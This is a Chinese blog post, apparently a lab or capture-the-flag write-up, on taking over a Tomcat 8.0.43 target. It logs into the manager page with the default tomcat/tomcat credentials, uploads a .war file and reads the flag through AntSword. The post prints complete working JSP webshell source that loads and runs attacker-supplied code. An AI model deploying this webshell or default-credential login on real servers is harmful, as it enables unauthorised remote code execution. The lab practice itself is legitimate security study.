中间件:tomcat弱口令

最新推荐文章于 2024-05-04 00:21:50 发布
最新推荐文章于 2024-05-04 00:21:50 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 靶场练习笔记 文章标签: tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56229643/article/details/120780196
版权

靶场地址:Apache Tomcat/8.0.43

解题准备:弱口令、准备asp、jsp马

解题思路:

1、进入网站默认登录地址,使用弱口令tomcat tomcat登录后台

http://www.whalwl.site:18081/manager/html

2、在war上传点上传一句话,要求是.war后缀 

3、第一次使用asp木马,虽然能够连接但似乎没有权限,无法读取文件

4、第二次使用jsp木马,网上复制一个蚁剑的,密码是passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

5、将这个new1.jsp打包为new1.zip

修改后缀为new1.war

上传成功,访问未报404,应该已经成功上传

6、蚁剑连接成功,在ROOT目录下找到flag 

漏了个大洞
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中创中间件window安装包
09-14
中创中间件(InforSuite-AS-StE-10.0.1.3),免安装解压即可
Tomcat弱口令漏洞及修复方式
HarryUpp的博客
06-28 1137
Tomcat弱口令漏洞及修复方式,完整实验!
mycat数据库中间件:概述完整版资料.pptx
11-14
mycat数据库中间件:概述完整版资料.pptx
Tomcat管理页面弱口令页面Getshell
weixin_45253622的博客
03-06 4542
Tomcat管理页面弱口令页面Getshell 传送门 Tomcat安装完成后,点击页面的 Manager App 处会弹出输入用户名和密码的认证框。 我们也可以直接访问:http://127.0.0.1:8080/manager/html 来访问该管理页面。 但是默认情况下,该页面只允许 tomcat 本机访问,其他主机访问时会显示403。 这时,只需要修改 webapps\manager\META-INF\context.xml 文件,注释下如下行即可。 此时,需要我们输入用户名和密码进行登录。
web漏洞-弱口令暴力破解
rumil的博客
05-14 2328
弱口令漏洞没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险。
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7017
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现。
Tomcat 弱口令漏洞复现
weixin_53696027的博客
02-13 785
vulhub靶场漏洞复现详细过程
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7468
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
Tomcat弱口令复现及利用(反弹shell)
weixin_45695535的博客
04-04 5547
整体过程欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编
tomcat 弱口令tomcat8】
向安全进发的博客
04-20 638
Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问。 攻击条件:如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。==
国产中间件:InforSuite AS中创
03-12
国产中间件应用完美适配各类业务系统,为客户提供安全稳定、高效可靠、使用便捷的业务运行支撑平台。
中间件:兵临城下.pdf
12-28
中间件:兵临城下.pdf
东方通中间件:TongWeb7.0.zip
03-12
国产中间件应用完美适配各类业务系统,为客户提供安全稳定、高效可靠、使用便捷的业务运行支撑平台。
tomcat7.0中间件
11-07
tomcat7.0版本中间件,有需要的可以下载使用,打包好的哦。
java+jsp+Oracle+Tomcat 记账管理系统论文(二)
如有问题请私信联系
05-01 742
本章内容包括系统类分析、核心业务设计、数据库设计三个部分,其中系统类分析需要给出系统类图和类的说明,需要注意在给出类图的时候只需要给出核心业务类,对辅助类如界面类、数据库连接类这种类型的不需要给出,如果所涉及的类(包括类当中的内容)较多时,应首先给出类间关系图(图中的类只有名称没有属性和方法),之后在单个类说明中给出具体类的类图,类图同样需要用WORD进行绘制。 核心业务设计主要描述的是完成某项具体业务时,类之间的消息配合,用时序图进行表述,时序图可以用其他工具绘制,但不能够有其他的颜色出现。 数据库设计主
tomcat的实现
最新发布
weixin_64842400的博客
05-04 418
一个连接器即是一个线程,线程一直在循环运行,接收所有先后到来的网络请求,并将每一个请求都按对应的协议转换为不同的request对象,随后将其作为参数使用引擎对象进行调用。服务器通常只有一个服务,默认是卡特琳娜。因为request对象包含完整的URL等信息,所以引擎能够解析到对应的虚拟主机host上(也即域名),进而在虚拟主机上找到对应的应用,如webFirst应用,最终找到应用下对应的servlet(通常就是我们写的业务代码)对请求进行处理。引擎是一个容器,其中包含一个或多个host对象,也即虚拟主机。
web server apache tomcat11-27-Security Considerations
04-28 1149
整理这个官方翻译的系列,原因是网上大部分的 tomcat 版本比较旧,此版本为 v11 最新的版本。默认情况下,Tomcat 被配置为在大多数使用情况下具有合理的安全性。某些环境可能需要更多或更少安全的配置。本页面旨在提供一个配置选项的单一参考点,这些选项可能会影响安全性,并对更改这些选项的预期影响提供一些评论。意图是提供一个配置选项列表,应在评估Tomcat安装的安全性时考虑。阅读本页面并不代替阅读和理解详细的配置文档。这些属性的更详细描述可能在相关的文档页面中找到。
Dockerfile实战(SSH、Systemctl、Nginx、Tomcat
taoxiayu的博客
04-28 477
--privileged:使container内的root拥有真正的root权限。否则,container内的root只是外部的一个普通用户权限。
Liunx发布tomcat项目
weixin_45941687的博客
04-28 418
Linux手动发布tomcat项目,修改配置
web中间件tomcat
04-04
1. 轻量级:Tomcat的核心部分非常小巧,占用资源较少,适合在资源有限的环境中使用。 2. 易于配置和部署:Tomcat提供了简单易用的配置文件,可以方便地进行配置和部署Web应用。 3. 支持多种协议:Tomcat支持HTTP、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值